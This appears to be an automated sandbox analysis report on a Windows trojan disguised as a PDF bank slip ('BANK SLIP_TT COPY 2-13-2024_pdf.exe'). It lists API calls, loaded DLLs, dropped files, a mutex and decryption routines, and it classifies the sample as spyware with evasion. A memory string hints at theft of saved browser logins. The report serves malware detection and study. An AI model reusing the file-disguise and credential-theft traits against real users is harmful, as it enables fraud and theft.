Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_3_03910656	6_3_03910656
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_3_0391011A	6_3_0391011A
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_3_03910006	6_3_03910006
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_3_039109C8	6_3_039109C8
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_038D9728	6_2_038D9728
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_038D1133	6_2_038D1133
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_038D1140	6_2_038D1140
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_33F92B68	6_2_33F92B68
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_33F92B47	6_2_33F92B47
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_341303C7	6_2_341303C7
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_34131470	6_2_34131470
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_341306FF	6_2_341306FF
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364A0F38	6_2_364A0F38
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364A2C0C	6_2_364A2C0C
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364A68B0	6_2_364A68B0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364A2EA2	6_2_364A2EA2
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364A2C51	6_2_364A2C51
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364A2C63	6_2_364A2C63
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364A8850	6_2_364A8850
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364A8860	6_2_364A8860
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364A68A0	6_2_364A68A0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364B4718	6_2_364B4718
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364B8B08	6_2_364B8B08
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36853CE0	6_2_36853CE0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36855D08	6_2_36855D08
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36854938	6_2_36854938
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_368557ED	6_2_368557ED
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36855C47	6_2_36855C47
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36855C61	6_2_36855C61
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36855A53	6_2_36855A53
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_368558A3	6_2_368558A3
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_368558FD	6_2_368558FD
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36855812	6_2_36855812
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36889610	6_2_36889610
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36887730	6_2_36887730
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_368855A8	6_2_368855A8
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36881520	6_2_36881520
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36883D18	6_2_36883D18
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36884930	6_2_36884930
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_3688960F	6_2_3688960F
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_3688161C	6_2_3688161C
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36881678	6_2_36881678
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36887720	6_2_36887720
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_3688176C	6_2_3688176C
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36881497	6_2_36881497
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36881510	6_2_36881510
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_3688B258	6_2_3688B258
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_3688B253	6_2_3688B253
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36881884	6_2_36881884
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_3688801A	6_2_3688801A
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36884060	6_2_36884060
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36880848	6_2_36880848
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36880840	6_2_36880840
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36DF90DE	6_2_36DF90DE
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36DF18E8	6_2_36DF18E8
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36DF18E3	6_2_36DF18E3
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5F6F0	6_2_36E5F6F0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E57FF0	6_2_36E57FF0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5A588	6_2_36E5A588
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5F1D0	6_2_36E5F1D0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5F996	6_2_36E5F996
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5F6E0	6_2_36E5F6E0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E586C3	6_2_36E586C3
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5C688	6_2_36E5C688
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E54673	6_2_36E54673
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5C678	6_2_36E5C678
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E57FE0	6_2_36E57FE0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5C7E3	6_2_36E5C7E3
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E57FA1	6_2_36E57FA1
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5F6F0	6_2_36E5F6F0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E504E0	6_2_36E504E0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E504D1	6_2_36E504D1
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E52DFB	6_2_36E52DFB
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5A578	6_2_36E5A578
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5A2C8	6_2_36E5A2C8
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5A2B8	6_2_36E5A2B8
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5F26E	6_2_36E5F26E
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5CA73	6_2_36E5CA73
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5CBDC	6_2_36E5CBDC
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E580A1	6_2_36E580A1
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5F8A2	6_2_36E5F8A2
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5F1C0	6_2_36E5F1C0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5F9DB	6_2_36E5F9DB
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C2EFEF	6_2_37C2EFEF
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C28F00	6_2_37C28F00
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C22463	6_2_37C22463
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C2D396	6_2_37C2D396
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C2AAE0	6_2_37C2AAE0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C23066	6_2_37C23066
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C2B7B0	6_2_37C2B7B0
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C28EF1	6_2_37C28EF1
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C2D58E	6_2_37C2D58E
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C2AD00	6_2_37C2AD00
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C22C6C	6_2_37C22C6C
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C2F433	6_2_37C2F433

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Code function: String function: 00402ACE appears 45 times

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe

Static PE information: invalid certificate

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2685034423.00000000362F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BANK SLIP_TT COPY 2-13-2024_pdf.exe
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs BANK SLIP_TT COPY 2-13-2024_pdf.exe
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2771075671.00000000039E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs BANK SLIP_TT COPY 2-13-2024_pdf.exe
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2799540825.0000000036BB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameClassLibrary1.dll" vs BANK SLIP_TT COPY 2-13-2024_pdf.exe
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798520337.00000000363F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDeyiza.dll" vs BANK SLIP_TT COPY 2-13-2024_pdf.exe
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2685194796.000000003630E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BANK SLIP_TT COPY 2-13-2024_pdf.exe
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2685272802.0000000036318000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BANK SLIP_TT COPY 2-13-2024_pdf.exe
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClassLibrary1.dll" vs BANK SLIP_TT COPY 2-13-2024_pdf.exe
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2685075391.0000000036307000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BANK SLIP_TT COPY 2-13-2024_pdf.exe
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs BANK SLIP_TT COPY 2-13-2024_pdf.exe

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, VnWFrsYxwlNaWEQ0a9K.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, VnWFrsYxwlNaWEQ0a9K.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, VnWFrsYxwlNaWEQ0a9K.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, oKDwMhBF54TE86sVW26.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, oKDwMhBF54TE86sVW26.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/14@6/3

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403180
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_004031C0 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		6_2_004031C0

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Code function: 0_2_004043C3 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004043C3

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Code function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,

0_2_004020CD

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

File created: C:\Users\user\AppData\Local\trder

Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Mutant created: \Sessions\1\BaseNamedObjects\f58528b1d28ceb87

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nseE674.tmp

Jump to behavior

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034530000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.00000000344E3000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe	Virustotal: Detection: 25%
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe	ReversingLabs: Detection: 37%

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

File read: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe "C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe"
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process created: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe "C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe"
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process created: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe "C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: gpapi.dll	Jump to behavior
